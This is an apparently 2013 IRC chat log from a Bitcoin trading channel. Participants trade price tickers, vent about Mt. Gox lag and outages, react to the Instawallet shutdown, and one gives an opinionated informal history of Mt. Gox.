infinite before 3 weeks from now. Apr 03 19:11:25 you think google has 100bn mkt depth on the books ? Apr 03 19:11:35 <[\\\]> nope Apr 03 19:11:47 There's some kind of limit... probably the end of the world or something Apr 03 19:11:59 and apparently, it causes BTC price to go up >.> Apr 03 19:12:00 i think there is no leverage, hence no depth Apr 03 19:12:16 Maybe the afterlife is digital. You'll need lots of Bitcoins there. Apr 03 19:12:21 ;;ticker Apr 03 19:12:22 BTCUSD ticker | Best bid: 134.00000, Best ask: 135.09999, Bid-ask spread: 1.09999, Last trade: 135.09999, 24 hour volume: 122225.75654344, 24 hour low: 107.75000, 24 hour high: 147.00000, 24 hour vwap: 125.57761 Apr 03 19:12:25 what happened to good old fashion put-your-money-in depth Apr 03 19:12:31 everybody with leverage these days Apr 03 19:12:36 nobody wants to work for a buck anymore Apr 03 19:12:47 also http://www.foxbusiness.com/industries/2013/04/03/ex-goldman-trader-turning-himself-in-to-authorities/ Apr 03 19:13:00 Namworld, no, they use dead altchains in hell Apr 03 19:13:41 The surrender comes after the Commodities Futures Trading Commission unleashed a lawsuit against Taylor in November that alleged he intentionally concealed an $8.3 billion position in the S&P 500 e-mini futures. The CFTC had been seeking civil penalties of $130,000. Apr 03 19:13:44 seems proportionate. Apr 03 19:14:13 <[\\\]> whats that bitcoinica clone? Apr 03 19:14:15 mircea_popescu: whoever used to keeping bitcoins on an exchange, learnt the lesson already Apr 03 19:14:43 [\\\]: bitfinex Apr 03 19:14:48 <[\\\]> ah, right Apr 03 19:14:56 <[\\\]> I'm sure people on bitfinex are making a killing Apr 03 19:15:17 jurov: ahah, makes sense Apr 03 19:15:38 502 gox Apr 03 19:16:10 [\\\] certainly. prolly time for a bitbet. Apr 03 19:17:58 sigh Apr 03 19:19:34 [MPEX] [O.USD.C188T] 50 @ 0.08799794 = 4.3999 BTC [+] Apr 03 19:21:40 uh bid higher than ask? Apr 03 19:21:48 bizarro Apr 03 19:22:00 http://notice.instawallet.org/ Apr 03 19:22:43 bitesak whoa. Apr 03 19:22:46 whoa whoa whoa. Apr 03 19:22:52 when did instawallet fold? Apr 03 19:23:09 2 days ago Apr 03 19:23:10 online wallet = bad Apr 03 19:23:43 I had 0,4BTC which I transferred to fastcash4bitcoin but it never got there.. Apr 03 19:24:09 and then it closed down. URLs of wallets were showing up in Google Apr 03 19:24:13 me never touched it.. Apr 03 19:24:49 do u think Bitcoin is cursed? Apr 03 19:25:00 [HAVELOCK] [VTX] 6 @ 0.38 = 2.28 BTC [-] Apr 03 19:25:17 [MPEX] [S.MPOE] 5076 @ 0.00069692 = 3.5376 BTC [-] Apr 03 19:25:17 it's backed by drama as someone once said Apr 03 19:25:37 [MPEX] [S.MPOE] 6121 @ 0.00069377 = 4.2466 BTC [-] Apr 03 19:25:39 all this is to make Bitcoin stronger :) Apr 03 19:26:00 [HAVELOCK] [VTX] 2 @ 0.36 = 0.72 BTC [-] Apr 03 19:26:30 got ask filled at 132.5 ouch Apr 03 19:26:36 bitesak totally. Apr 03 19:26:37 oh wellls Apr 03 19:27:09 Bitcoin is indeed cursed. Cursed by idiots. Apr 03 19:27:38 <[\\\]> heh Apr 03 19:28:38 all i have to say, boys and girls, is that if it popped later it'd have been much worse. Apr 03 19:28:38 all i wanted was a bit car, but then I got greedy. why why why??? Apr 03 19:28:46 let it simmer a little, it won't get too low, we come to sanity. k ? Apr 03 19:28:47 dude Apr 03 19:29:00 u r overconfident about poppage. Apr 03 19:29:37 ^ Apr 03 19:29:59 bugpowda i sold some at 117-120 and don't give a fuck about Apr 03 19:30:50 you dispute a broken trend ?! Apr 03 19:31:12 I called the top at 127 last night Apr 03 19:31:15 well when you rise $47 in one day where do you draw the line? Apr 03 19:31:22 then 147 happened Apr 03 19:32:01 my off-the-cuff math says at least %13 daily deflation to stay on track for 1 trillion usd Apr 03 19:32:11 mircea_popescu, do you have that pastebin on mercadoBitcoin brasil handy? Apr 03 19:32:32 http://trilema.com/2013/and-another-one-bites-the-dust-mercado-bitcoin/ Apr 03 19:32:38 thx Apr 03 19:33:21 lol they still feature this on frontpage: https://mtgox.com/img/quote.gif Apr 03 19:33:57 2011 was a good year for the dinosaurs. Apr 03 19:34:28 $avg Apr 03 19:34:29 ThickAsThieves: 126.02 Apr 03 19:34:50 interesting convergence http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Apr 03 19:35:28 check out the mega 140 wall Apr 03 19:35:32 people cant decide price for themselves Apr 03 19:35:43 built by you MP? Apr 03 19:36:05 ThickAsThieves neh. Apr 03 19:36:22 ;;bids 0 Apr 03 19:36:23 There are currently 30863303 bitcoins demanded at or over 0.0 USD, worth 9011317.20884 USD in total. | Data vintage: 112.2002 seconds Apr 03 19:36:28 ok Apr 03 19:36:31 I have sold enough Apr 03 19:36:45 #bitcoin is creeping up towards 1500 users Apr 03 19:36:51 [MPEX] [O.USD.C029T] 2 @ 0.77218744 = 1.5444 BTC Apr 03 19:36:51 that's double since January Apr 03 19:36:55 for sure Apr 03 19:48:55 [MPEX] [S.MPOE] 4129 @ 0.00069377 = 2.8646 BTC [-] Apr 03 19:52:44 $unconfirmed Apr 03 19:52:56 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 03 19:53:05 well, poo Apr 03 19:53:39 medium article is good Apr 03 19:53:41 https://medium.com/money-banking/2b5ef79482cb Apr 03 19:53:54 $vwap ^oix Apr 03 19:53:56 mircea_popescu: ^OIX 1 day: no data 7 day: average: 108.2380102 high: 135.79574203 low: 93.3570601 volume: 19607 btc: 8036.29427679 30 day: no data Apr 03 19:54:26 [MPEX] [S.DICE] 1000 @ 0.00317003 = 3.17 BTC [-] Apr 03 19:54:28 [MPEX] [S.DICE] 13096 @ 0.00317002 = 41.5146 BTC [-] Apr 03 19:59:53 http://bitbet.us/bet/362/bitfinex-insolvent-by-end-of-april/ Apr 03 19:59:54 lalala Apr 03 20:06:11 <[\\\]> trolalalal Apr 03 20:06:20 a little bit Apr 03 20:07:40 wanna bet ? Apr 03 20:10:33 insider information Apr 03 20:13:25 lol https://www.kraken.com/market Apr 03 20:13:43 crash much? Apr 03 20:14:30 aww but y! Apr 03 20:14:30 ah nvm Apr 03 20:14:44 that was my settings Apr 03 20:15:18 lol you had it set for crash ? Apr 03 20:15:35 yeah something like that :D Apr 03 20:15:47 it still wants to rally Apr 03 20:15:57 if gox will let it Apr 03 20:16:05 [BTCTC] [S.DICE-PT] 3 @ 0.0048 = 0.0144 BTC [+] Apr 03 20:16:26 http://notice.instawallet.org/ Apr 03 20:16:28 wait a second. Apr 03 20:16:38 they pay < 50 btc after 90 days and > 50 btc IF POSSIBLE ? Apr 03 20:16:42 so funds were in fact lost. Apr 03 20:17:50 looks like it Apr 03 20:18:10 minicyprus Apr 03 20:18:13 oh noes Apr 03 20:18:22 what was that transaction again? Apr 03 20:18:22 its funny how AAPL only goes up when the rest of tech goes down Apr 03 20:19:10 tech is a zerosum game no? ;) Apple vs everyone else. Apr 03 20:19:34 ;;ticker Apr 03 20:19:35 BTCUSD ticker | Best bid: 137.50000, Best ask: 138.00000, Bid-ask spread: 0.50000, Last trade: 138.00000, 24 hour volume: 125538.92052295, 24 hour low: 108.00005, 24 hour high: 147.00000, 24 hour vwap: 126.35150 Apr 03 20:19:40 gawd damnit Apr 03 20:19:52 Bugpowder: what is wrong? Apr 03 20:20:01 weren;t you just buying? Apr 03 20:20:09 at ~130 Apr 03 20:20:25 no Apr 03 20:20:42 i am a bit loser Apr 03 20:21:14 ahh "got ask filled at 132.5 ouch" Apr 03 20:21:41 (lower) Apr 03 20:22:06 90% of the time, the best move is to sit on hands Apr 03 20:23:48 with the lag trading seems a crapshoot. Apr 03 20:23:57 (random lag) Apr 03 20:27:33 [MPEX] [S.DICE] 1000 @ 0.00333521 = 3.3352 BTC [+] Apr 03 20:32:26 Bugpowder: I concur see quote #1 http://en.wikipedia.org/wiki/Reminiscences_of_a_Stock_Operator#Quotes Apr 03 20:32:58 I wish I'd sat tight this morning instead of my derp trades. Apr 03 20:34:07 According to media headlines, Slovenia can soon be next to request a financial help from EU. Do you have any plan B to protect your customers funds in case the Cyprus will happen over again? Apr 03 20:34:14 lol Apr 03 20:34:15 Bitstamp: Yes, we are in process of opening a UK based bank account. Apr 03 20:34:24 ^ appeared in my fb feed Apr 03 20:35:33 sounds stressful Apr 03 20:35:43 "we don't have that much money anyway" Apr 03 20:35:54 anyone else have trouble sending bitcoins from WeExchange today Apr 03 20:35:56 [MPEX] [S.DICE] 1500 @ 0.0033 = 4.95 BTC [-] Apr 03 20:35:58 [MPEX] [S.DICE] 50 @ 0.0031702 = 0.1585 BTC [-] Apr 03 20:37:08 obviously the UK is a much bigger financial center but still are not immune to a rough ride Apr 03 20:38:39 would be interesting if FSA will take any action against bitstamp Apr 03 20:38:40 When does SDICE officially declare a div or non-div? Today, tomorrow? Apr 03 20:39:01 [HAVELOCK] [SDICE] 33 @ 0.33 = 10.89 BTC [+] Apr 03 20:39:03 [HAVELOCK] [SDICE] 11 @ 0.325 = 3.575 BTC [-] Apr 03 20:39:03 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 03 20:39:29 unless they have been preparing this for a while, I don't think they will be having a bank account too soon Apr 03 20:40:40 unbalanced_ they have to do it within five days of new month Apr 03 20:40:48 unless exceptional circumstances. Apr 03 20:42:37 ;;ticker Apr 03 20:42:38 BTCUSD ticker | Best bid: 138.78000, Best ask: 138.80000, Bid-ask spread: 0.02000, Last trade: 138.80000, 24 hour volume: 126892.36002240, 24 hour low: 108.00060, 24 hour high: 147.00000, 24 hour vwap: 126.58123 Apr 03 20:42:43 ;;goxlag Apr 03 20:42:44 MtGox lag is 226.450443 seconds. During this time, light travels 0.453804152306 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 03 20:44:27 you could have sent a bitcoin straight into the trashbin. Apr 03 20:46:26 https://bitpay.com/amazon Apr 03 20:46:30 thefuck? Apr 03 20:46:52 [BTCTC] [BTC-TRADING-PT] 1 @ 0.18861 BTC [+] Apr 03 20:47:04 This currently works only with WooCommerce. Apr 03 20:47:05 awww. Apr 03 20:47:09 i was impressed for a second Apr 03 20:47:12 The services BitPay offers have not been directly approved by Amazon.com and customers should not confuse these services offered by the Bitpay WooCommerce plugin as being endorsed, sponsored or approved by Amazon.com. Apr 03 20:47:32 too bad Apr 03 20:47:38 ;) Apr 03 20:47:39 [BTCTC] [BTC-TRADING-PT] 9 @ 0.1886 = 1.6974 BTC [-] Apr 03 20:48:54 [BTCTC] [BTC-TRADING-PT] 10 @ 0.1886 = 1.886 BTC [-] Apr 03 20:49:30 [BTCTC] [ASICMINER-PT] 4 @ 0.755 = 3.02 BTC [+] Apr 03 20:53:59 [HAVELOCK] [VTX] 4 @ 0.4 = 1.6 BTC [+] Apr 03 20:54:00 [HAVELOCK] [VTX] 25 @ 0.4 = 10 BTC [+] Apr 03 20:54:02 [HAVELOCK] [VTX] 4 @ 0.405 = 1.62 BTC [+] Apr 03 20:54:03 [HAVELOCK] [VTX] 15 @ 0.41 = 6.15 BTC [+] Apr 03 20:57:58 and still no update on AMs missing 6Thash... Apr 03 20:58:41 yep i anticipate sell offs this week Apr 03 20:59:07 sdice has weakened too Apr 03 20:59:41 yet, as of yesterday they were up 750 bitcoins or so, just in the first couple days Apr 03 21:00:05 that can change of course, but a really good start Apr 03 21:02:59 [HAVELOCK] [VTX] 2 @ 0.41 = 0.82 BTC [+] Apr 03 21:03:28 Uglux it;'s been 3 months yet ? Apr 03 21:04:59 [HAVELOCK] [VTX] 1 @ 0.41 BTC [+] Apr 03 21:05:51 http://www.usd2btc.com/ ? Apr 03 21:07:02 yea, i call it a bf-ai-l/avalonism. promising shit. delivering "somthing" + blabla... Apr 03 21:10:00 [HAVELOCK] [VTX] 22 @ 0.41 = 9.02 BTC [+] Apr 03 21:12:08 ;;ticker Apr 03 21:12:09 BTCUSD ticker | Best bid: 137.80000, Best ask: 138.00000, Bid-ask spread: 0.20000, Last trade: 138.00000, 24 hour volume: 128828.52600909, 24 hour low: 108.05000, 24 hour high: 147.00000, 24 hour vwap: 126.82527 Apr 03 21:16:01 [HAVELOCK] [VTX] 7 @ 0.41 = 2.87 BTC [+] Apr 03 21:26:44 ;;ticker Apr 03 21:26:46 BTCUSD ticker | Best bid: 133.33000, Best ask: 134.00000, Bid-ask spread: 0.67000, Last trade: 134.00000, 24 hour volume: 128637.79888326, 24 hour low: 108.45001, 24 hour high: 147.00000, 24 hour vwap: 127.12429 Apr 03 21:27:06 "To learn that a man can make foolish plays for no reason whatever was a valuable lesson. It cost me millions to learn that another dangerous enemy to a trader is his susceptibility to the urgings of a magnetic personality when plausibly expressed by a brilliant mind." Apr 03 21:27:33 This is what just happened to me with mircea_popescu's bubble poppin' talk Apr 03 21:27:49 wait what ?! Apr 03 21:28:13 I SOLD IT ALL Apr 03 21:28:16 oh wait Apr 03 21:28:18 um Apr 03 21:28:28 what, you sold it for less than 133 ?! Apr 03 21:28:28 no just 20% Apr 03 21:28:29 whew Apr 03 21:28:37 ;;ticker Apr 03 21:28:38 BTCUSD ticker | Best bid: 134.00000, Best ask: 134.99900, Bid-ask spread: 0.99900, Last trade: 134.99900, 24 hour volume: 128637.79888326, 24 hour low: 108.45001, 24 hour high: 147.00000, 24 hour vwap: 127.12429 Apr 03 21:28:42 and now its falling agoin Apr 03 21:28:56 Bugpowder: Perhaps a break is in order? Apr 03 21:28:57 just sit on your hands Apr 03 21:28:57 soooo... whatcher on aboot. Apr 03 21:29:11 feels like it needs to take a breather... Apr 03 21:29:36 umm Apr 03 21:29:45 One month ago I would be so stoked to have this value in my total btc portfolio. Now I've cashed that same amount out, and still have more left. Apr 03 21:29:46 did last blockchain glitch happen 1480 blocks ago? Apr 03 21:30:15 no matter what, I'm not going to buy puts. Apr 03 21:30:35 why not? Too expensive? Apr 03 21:30:37 Well hello text message.... Apr 03 21:30:43 new localbitcoins contact... Apr 03 21:30:51 I guess I can sell just a bit more. Apr 03 21:30:58 I always lose on puts. Apr 03 21:31:16 YMMV Apr 03 21:31:50 sigh: http://nymag.com/daily/intelligencer/2013/04/i-bought-a-bitcoin.html Apr 03 21:33:18 Hey can someone explain what the story is with coinlab and mtgox? If I have an exisiting mtgox does that mean I can't trade, or it's a pain to transfer fiat in and out? Apr 03 21:34:56 new idea: betting game based on random goxlag numbers...goxlagdice Apr 03 21:35:43 someone will analyze the statistics of goxlag on create a strategy based on that... Apr 03 21:35:50 on -> and Apr 03 21:36:00 lol Apr 03 21:36:28 mm. there already is one... Apr 03 21:37:04 if (lag > 10s) buy at tickerprice - 10% Apr 03 21:37:49 lol Apr 03 21:37:59 it will be provably unfair to all participants Apr 03 21:38:09 chart is quite insane… http://bitcoincharts.com/charts/mtgoxUSD#rg60zigHourlyztgSza1gSMAzm1g1zm2g25zv even with pullback Apr 03 21:39:03 I think there was a bit of a bumrush after 100 looked like it would hold Apr 03 21:44:45 ;;ticker Apr 03 21:44:46 BTCUSD ticker | Best bid: 133.50000, Best ask: 134.30000, Bid-ask spread: 0.80000, Last trade: 134.30000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 21:49:53 thats old though right Apr 03 21:52:49 [MPEX] [S.MPOE] 10953 @ 0.00067393 = 7.3816 BTC [-] Apr 03 21:54:44 [BTCTC] [PAJKA.BOND] 10 @ 0.09 = 0.9 BTC [-] Apr 03 21:55:00 oh boy Apr 03 21:55:00 [BTCTC] [PAJKA.BOND] 2 @ 0.101 = 0.202 BTC [+] Apr 03 21:55:03 [BTCTC] [PAJKA.BOND] 5 @ 0.100001 = 0.5 BTC [-] Apr 03 21:56:33 goxlice ? Apr 03 21:57:18 o look. 3k sold brought it down another 10%. Apr 03 21:57:57 stupid gox.... Apr 03 21:58:04 seriously, someone kill them please Apr 03 21:58:12 the power is yours. Apr 03 21:58:14 do you use them ? Apr 03 21:58:19 this is just temp? Apr 03 21:58:45 no. Apr 03 21:59:03 ;;ticker Apr 03 21:59:04 BTCUSD ticker | Best bid: 126.25000, Best ask: 126.93439, Bid-ask spread: 0.68439, Last trade: 126.25000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 21:59:17 seems like it will go further Apr 03 21:59:22 Apr 03 14:11:37 so basicvally... any dollar over 100 anyone pays on a btc is a dollar lost. Apr 03 21:59:41 12 point spread on clarkmoody Apr 03 21:59:53 ;;ticker Apr 03 21:59:54 BTCUSD ticker | Best bid: 125.12500, Best ask: 127.00000, Bid-ask spread: 1.87500, Last trade: 127.00000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 21:59:58 seeing trades osilating between 127 and 115 Apr 03 22:00:01 [HAVELOCK] [SDICE] 1 @ 0.32100001 BTC [+] Apr 03 22:00:02 its trading ~117 atm Apr 03 22:00:37 bob has bitch tits Apr 03 22:00:41 Gox is completly useless... Apr 03 22:00:48 no the bid.. ask looks a lot higher.. at least for the moment Apr 03 22:00:57 s/no/on/ Apr 03 22:01:04 115s Apr 03 22:01:28 look at coinlab Apr 03 22:01:30 115 Apr 03 22:01:31 fucking crazy Apr 03 22:01:41 no, actually, perfectly healthy. Apr 03 22:01:49 the runup past 100 was the crazy part. Apr 03 22:01:59 yes, the runup past 100 was nuts Apr 03 22:02:05 where are the grownups? Apr 03 22:02:15 lemmings have hopefully been slaughtered enough to learn for the future. Apr 03 22:02:17 but if not... Apr 03 22:02:19 I see 125.125, 125.125, 115.123, 115.12156.. huge spread again Apr 03 22:02:22 Apr 03 22:02:31 [BTCTC] [S.DICE-PT] 22 @ 0.00441 = 0.097 BTC [-] Apr 03 22:02:33 [BTCTC] [S.DICE-PT] 200 @ 0.0044 = 0.88 BTC [-] Apr 03 22:02:36 [BTCTC] [S.DICE-PT] 86 @ 0.004305 = 0.3702 BTC [-] Apr 03 22:02:56 looks like 105 will print here in a minute Apr 03 22:03:06 real thin between 115 and even 134.. Apr 03 22:03:09 [BTCTC] [GSDPT] 1 @ 0.004096 BTC [+] Apr 03 22:03:13 [BTCTC] [GSDPT] 53 @ 0.004096 = 0.2171 BTC [+] Apr 03 22:03:17 [BTCTC] [GSDPT] 100 @ 0.004097 = 0.4097 BTC [+] Apr 03 22:03:25 [BTCTC] [GSDPT] 154 @ 0.004098 = 0.6311 BTC [+] Apr 03 22:03:56 !ticker m s.dice Apr 03 22:03:58 [MPEX:S.DICE] 1D: 0.00310001 / 0.00331688 / 0.00400173 (29870 shares, 99.08 BTC), 7D: 0.0031 / 0.00330394 / 0.00448 (727656 shares, 2,404.13 BTC), 30D: 0.00300001 / 0.00422354 / 0.006225 (1578663 shares, 6,667.56 BTC) Apr 03 22:04:14 !ticker m s.mpoe Apr 03 22:04:16 [MPEX:S.MPOE] 1D: 0.00067351 / 0.00068435 / 0.00069999 (215208 shares, 147.28 BTC), 7D: 0.00059218 / 0.0006566 / 0.00069999 (2600753 shares, 1,707.67 BTC), 30D: 0.00059218 / 0.00072363 / 0.00078628 (18234279 shares, 13,195.02 BTC) Apr 03 22:04:29 !ticker h him Apr 03 22:04:31 [HAVELOCK:HIM] 1D: 1.87000000 / 1.94453478 / 2.00000000 (23 shares, 44.72430000 BTC), 7D: 1.80000000 / 1.92572839 / 2.08000000 (162 shares, 311.96799996 BTC), 30D: 1.40001001 / 1.80151405 / 2.08000000 (737 shares, 1327.71585265 BTC) Apr 03 22:04:31 [BTCTC] [S.DICE-PT] 1246 @ 0.00426 = 5.308 BTC [-] Apr 03 22:04:39 As percentages go this isn't really that unusual for btc.. but with the increase in value a 10+ point spread seems wide Apr 03 22:04:54 [BTCTC] [GSDPT] 746 @ 0.004098 = 3.0571 BTC [+] Apr 03 22:05:03 [BTCTC] [GSDPT] 500 @ 0.0041 = 2.05 BTC [+] Apr 03 22:05:10 [MPEX] [O.USD.C131T] 1 @ 0.14307752 BTC [-] Apr 03 22:05:16 i would say today is a great day in that disaster was averted Apr 03 22:05:39 until the next day Apr 03 22:06:06 [BTCTC] [S.DICE-PT] 490 @ 0.00426 = 2.0874 BTC [-] Apr 03 22:06:09 nah, at least in theory hysteria just needs a coupla slaps. Apr 03 22:08:22 ;;ticker Apr 03 22:08:22 mircea_popescu: What is your fear in particular? megacrash? Apr 03 22:08:23 BTCUSD ticker | Best bid: 119.22835, Best ask: 120.00000, Bid-ask spread: 0.77165, Last trade: 120.00000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 22:08:32 [BTCTC] [GSDPT] 490 @ 0.004199 = 2.0575 BTC [+] Apr 03 22:08:45 (which breaks all faith in btc) Apr 03 22:08:48 ;;ticker Apr 03 22:08:48 BTCUSD ticker | Best bid: 117.70000, Best ask: 120.00000, Bid-ask spread: 2.30000, Last trade: 117.70000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 22:08:54 ooh crash Apr 03 22:08:57 I would think the greatest fear would be the bot gets megaraped Apr 03 22:09:00 ;;gox Apr 03 22:09:00 Error: "gox" is not a valid command. Apr 03 22:09:03 ;;goxlag Apr 03 22:09:04 MtGox lag is 388.162939 seconds. During this time, light travels 0.777874183667 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 03 22:09:17 ah, we got goxxed again Apr 03 22:09:52 goxlag makes me feel like shooting a missile right at their face... Apr 03 22:10:05 It's still not fixed... how incompetent can you be? Apr 03 22:10:29 bgupta there's a fundamental macroeconomic problem at work, as follows : Apr 03 22:10:36 the bitcoin holders were done selling. Apr 03 22:10:39 it's shocking, really, when you consider the magnitude of the opportunity gox has... Apr 03 22:10:44 left in the market, newb speculators selling to each other Apr 03 22:10:52 turning bitcoin into a sort of "bitcoin gem" by default. Apr 03 22:11:03 this is not acceptable. a buncha new kids don't get to run the town. Apr 03 22:11:28 moreover, the systemic risk they pose is that they'll blow it up then crash it with their desperation, creating fake "proof" that it's "a ponzi" Apr 03 22:11:35 just because they're retards and used it as a ponzi. Apr 03 22:11:47 true dat Apr 03 22:12:05 seeing how we're discussing a 1bn+ item here, which is more than a uss carrier with full equipment on board Apr 03 22:12:25 and the wanna-be movers and shakers are... well... you know. Apr 03 22:13:17 ;;goxlag Apr 03 22:13:18 MtGox lag is 458.030321 seconds. During this time, light travels 0.917887634921 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 03 22:13:21 damn Apr 03 22:13:22 xD Apr 03 22:13:25 ;;ticker Apr 03 22:13:26 BTCUSD ticker | Best bid: 123.00000, Best ask: 125.00000, Bid-ask spread: 2.00000, Last trade: 125.00000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 22:13:46 actually, I believe than an arcraft carrier costs quite a bit more, no? Apr 03 22:13:55 about 1bn afaik Apr 03 22:14:05 haven't been in the market recently tho Apr 03 22:15:16 pgp: quite a lot more Apr 03 22:15:17 http://www.facethefactsusa.org/facts/New-Aircraft-Carrier-Does-More-with-Less-Crew/ Apr 03 22:15:33 eh fuck me. Apr 03 22:15:39 lol Apr 03 22:15:39 i stand corrected. Apr 03 22:15:47 i must be on 1990 dollars or some shit. Apr 03 22:15:57 aaanyway. Apr 03 22:16:07 yeah, 1 billion does not buy the govt much anymore Apr 03 22:16:18 of course that's ops cost Apr 03 22:16:23 ship itself is only half that Apr 03 22:17:00 the water treatment plant the city is builing - ran over budget and cost 1.1 billion Apr 03 22:17:04 so we need an aircraftcarrier index. the pizza index is obsolete :) Apr 03 22:17:06 in a city of 1 million Apr 03 22:17:13 mircea_popescu: Modern carriers are massive. have neculear reactors, and a huge contingent of very expensive warplanes Apr 03 22:17:20 jborkl so basically 1k per capita ? scandalous. Apr 03 22:17:32 bgupta yes yes, i stepped in it :D Apr 03 22:17:34 it is not the only plant either Apr 03 22:17:44 ;;goxlag Apr 03 22:17:48 MtGox lag is 614.571582 seconds. During this time, light travels 1.23159456924 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 03 22:17:51 even goxlag is lagging Apr 03 22:18:24 perhaps this one can be had for cheap: http://blog.seattlepi.com/aerospace/2011/03/29/wanna-buy-an-aircraft-carrier/ Apr 03 22:18:48 heh, i bought a pizza for rg last year and he pain me 1.5 bitcoins Apr 03 22:18:49 lol Apr 03 22:18:53 where's tiberius guy to show me mercedes links when we need him. Apr 03 22:18:53 paid Apr 03 22:20:18 ;;seen topace Apr 03 22:20:19 topace was last seen in #bitcoin-assets 4 days, 22 hours, 31 minutes, and 58 seconds ago: Apr 03 22:22:02 I have gotten 3 messages from localbitcoin buyers today Apr 03 22:26:06 ;;ticker Apr 03 22:26:06 BTCUSD ticker | Best bid: 124.62312, Best ask: 125.00000, Bid-ask spread: 0.37688, Last trade: 125.00000, 24 hour volume: 129330.89554659, 24 hour low: 108.70001, 24 hour high: 147.00000, 24 hour vwap: 127.38315 Apr 03 22:33:16 ;;goxlag Apr 03 22:33:18 Error: Problem retrieving gox lag. Try again later. Apr 03 22:33:28 down again? Apr 03 22:34:51 mtgox.com 502 bad gateway Apr 03 22:34:56 lol Apr 03 22:35:01 mircea_popescu: You have a test instance with fake data? Want to test playing with API without bot asks/bids disappearing. Apr 03 22:35:29 bgupta what is this about ? Apr 03 22:35:32 (Not for direct trading just getting quotes I care about) Apr 03 22:35:55 want to script updated quotes. Apr 03 22:36:05 o you mean the mpex json ? Apr 03 22:36:09 no there's no fake data feed. Apr 03 22:36:13 yeah Apr 03 22:36:16 ok.. Apr 03 22:36:28 perhaps try on a more copacetic symbol ? Apr 03 22:36:32 s.bbet is pretty stable say Apr 03 22:36:36 ;;ticker Apr 03 22:36:36 Error: Failure to retrieve ticker. Try again later. Apr 03 22:37:11 gox Apr 03 22:37:13 truly pathetic state of affairs Apr 03 22:39:07 mircea_popescu: Need account to use API? Hoping not for quotes. Apr 03 22:39:21 you know this api talk keeps throwing me for a loop Apr 03 22:39:34 mpex has no api. it's just some public json/jsonp calls Apr 03 22:39:41 and the trade window Apr 03 22:40:00 ok.. Apr 03 22:40:23 so you know, you can pull the feeds just fine, they're public Apr 03 22:41:03 this make sense to you ? Apr 03 22:41:25 ;;ticker Apr 03 22:41:26 Error: Failure to retrieve ticker. Try again later. Apr 03 22:41:35 yes. Apr 03 22:42:13 aight. mtgox got ddosed Apr 03 22:42:26 this is what I wanted http://mpex.co/mpex-mktdepth.php Apr 03 22:42:34 (I think) Apr 03 22:42:41 need to pretty print it Apr 03 22:45:24 alrighy. Apr 03 22:45:34 instawallet hacked Apr 03 22:45:38 lol Apr 03 22:45:59 ;;ticker Apr 03 22:45:59 Error: Failure to retrieve ticker. Try again later. Apr 03 22:46:10 ;;goxlag Apr 03 22:46:11 Error: Problem retrieving gox lag. Try again later. Apr 03 22:46:13 don't worry guys they are rolling out ltc and nmc Apr 03 22:46:20 that will fix it Apr 03 22:46:20 and ppcoin Apr 03 22:46:22 no novacoin ? Apr 03 22:46:42 also, i hope ycombinator has litebase, litelab, namebase, namelab Apr 03 22:46:47 pee pee coin Apr 03 22:46:48 blablab and tralalab all ready Apr 03 22:46:54 ? Apr 03 22:46:58 this gox shit just gets me so hot under the collar... Apr 03 22:47:01 ppcoin is going to buy me an 86 Apr 03 22:47:57 gox did a runner. the biggest bitcoin scam on the universe Apr 03 22:47:59 any insight into why they just can't license a matching engine... Apr 03 22:48:01 i hope they are proud Apr 03 22:48:12 pgp: idiocy Apr 03 22:48:31 ddos Apr 03 22:48:47 yes they are incompetent because ddos Apr 03 22:48:47 https://bitcointalk.org/index.php?topic=165880.msg1733865#msg1733865 Apr 03 22:48:49 this guy... lol Apr 03 22:49:06 pgp you understand only recently they had any money ? Apr 03 22:49:12 (recently = since about feb) Apr 03 22:51:10 I see - success basically caught these guys with their pants down Apr 03 22:51:27 no, it made them a massive target Apr 03 22:51:33 pants or no pants Apr 03 22:52:24 history of mtgox for the more recent bitcoin ppl : Apr 03 22:52:44 started about a year after btc as an outgrowth of a game cards trading thing owned by the guy now doing ripple. Apr 03 22:52:53 was basically given away to tux because of legal concerns. Apr 03 22:53:06 tux proceeded to get hacked, lose the entire email base, to this day these emails are spammed. Apr 03 22:53:37 tux then proceeded to get hacked, which may or may not have been the fake account they used to house trade, but anyway btc got sold down to 0 Apr 03 22:53:40 and why hasnt it made money since forever? Apr 03 22:53:44 tux then got outside investors for ~1.5mn Apr 03 22:54:01 used this to get offices, hire some employees, get some real servers, etc. Apr 03 22:54:24 this put him in the red all through 2012 (plus some hacks and other unsavory shit, plus taking over hacked stuff like a polish exchange Apr 03 22:54:38 jezz down for 20 mins Apr 03 22:54:40 plus making a narrow escape from the EU for not having banking licenses) Apr 03 22:55:03 they were marginally profitable once btc went over 10 again, but barely enough to dig investors out of their equity hole Apr 03 22:55:15 then the high prices high volumes hit, now they're making enough to be an actual business. Apr 03 22:55:20 but they only have for two months, give or take. Apr 03 22:55:31 taking questions. Apr 03 22:55:41 more on that EU escape story? Apr 03 22:55:42 very nice rundown mp Apr 03 22:55:56 taub had a bank account in france, french authority investigated them Apr 03 22:56:04 they offered the theory that they don't need licensing because bitcoin Apr 03 22:56:07 you missed tux being a pompus bag of dicks Apr 03 22:56:08 got shut down the next day Apr 03 22:56:09 accross the uruls on camelback? Apr 03 22:56:12 hen I signed up(right after the hack) they gave me a free yubikey- free shipping Apr 03 22:56:16 no charges (but maybe a civil penalty, it's unclear) Apr 03 22:56:30 i see Apr 03 22:56:48 currently they're also involved into a mess not of their making Apr 03 22:56:59 ? Apr 03 